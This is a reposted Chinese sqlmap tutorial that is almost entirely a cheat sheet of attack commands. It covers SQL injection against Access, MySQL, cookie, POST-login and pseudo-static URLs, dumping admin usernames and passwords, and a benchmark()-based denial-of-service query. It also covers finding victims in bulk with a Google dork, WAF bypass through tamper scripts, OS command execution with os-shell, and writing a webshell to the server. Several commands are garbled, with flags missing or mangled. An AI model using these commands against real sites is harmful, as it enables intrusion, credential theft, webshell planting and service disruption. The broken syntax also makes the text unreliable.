SQLMAP注入教程-11種常見SQLMAP使用方法詳解


一、SQLMAP用於Access數據庫注入

python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7"

python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --tables

python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --columns -T admin

python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --dump -T admin -C "username,password"

二、SQLMAP用於Cookie注入

python sqlmap.py -u "http://www.xxx.org/jsj/shownews.asp" --cookie "id=31" --table --level 2

python sqlmap.py -u "http://www.xxx.org/jsj/shownews.asp" --cookie "id=31" --columns -T

python sqlmap.py -u "http://www.xxx.org/jsj/shownews.asp" --cookie "id=31" --dump -T

三、SQLMAP用於mysql中DDOS攻擊

python sqlmap.py -u [url]http://192.168.159.1/news.php?id=1[/url] --sql-shell

select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)

四、SQLMAP用於mysql注入

python sqlmap.py -u "http://www.xxx.com/link.php?id=321" --dbs

python sqlmap.py -u "http://www.xxx.com/link.php?id=321" -D dataname --tables

python sqlmap.py -u "http://www.xxx.com/link.php?id=321" -D dataname -T table_name --columns

python sqlmap.py -u "http://www.xxx.com/link.php?id=321" -D dataname -T table_name -"id,user,password" --dump

五、SQLMAP中post登陸框注入

1. 瀏覽器打開目標地址http:// www.xxx.com /Login.asp

2. 配置burp代理(127.0.0.1:8080)以攔截請求

3. 點擊login表單的submit按鈕

4. 這時候Burp會攔截到了我們的登錄POST請求

5. 把這個post請求復制為txt, 我這命名為search-test.txt 然后把它放至sqlmap目錄下

6. 運行sqlmap並使用如下命令:

./sqlmap.py -r search-test.txt -p tfUPass

自動搜索注入:
sqlmap -u [url]http://testasp.vulnweb.com/Login.asp[/url] --forms
指定參數注入:
sqlmap -u [url]http://testasp.vulnweb.com/Login.asp[/url] --data "tfUName=321&tfUPass=321"

六、SQLMAP中Google搜索注入

sqlmap -g inurl:php?id=

七、SQLMAP中的請求延遲

參數 --delay --safe-freq
python sqlmap.py --dbs -u "http://xxx.cn/index.php/Index/view/id/40.html" --delay 1
python sqlmap.py --dbs -u "http://xxx.cn/index.php/Index/view/id/40.html" --safe-freq 3
 

八、SQLMAP繞過WAF防火牆

 
sqlmap -u [url]http://192.168.159.1/news.php?id=1[/url] -v 3 --dbs --batch --tamper "space2morehash.py"
 
 

space2morehash.py中可以替換space2hash.py或者base64encode.py或者charencode.py

都是編碼方式

space2hash.py base64encode.py charencode.py

九、SQLMAP查看權限

sqlmap -u [url]http://192.168.159.1/news.php?id=1[/url] --privileges

十、SQLMAP偽靜態注入(1) 查找數據庫

python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" --dbs

python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" -D dataname --tables

python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" -D dataname -tablename --columns

python sqlmap.py -"http://xxx.cn/index.php/Index/view/id/40.html" -D dataname -tablename -"password" --dump

十一、SQLMAP注入點執行命令與交互寫shell 

sqlmap -u [url]http://192.168.159.1/news.php?id=1[/url] --os-cmd=ipconfig
 
sqlmap -u [url]http://192.168.159.1/news.php?id=1[/url] --os-shell

–file-read=RFILE 從后端的數據庫管理系統文件系統讀取文件 (物理路徑)

–file-write=WFILE 編輯后端的數據庫管理系統文件系統上的本地文件 (mssql xp_shell)

–file-dest=DFILE 后端的數據庫管理系統寫入文件的絕對路徑

sqlmap -r “c:\request.txt” -p id –dbms mysql –file-dest “e:\php\htdocs\dvwa\inc\include\1.php” –file-write “f:\webshell\1112.php”

轉載:https://www.cnblogs.com/ichunqiu/p/5805108.html

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM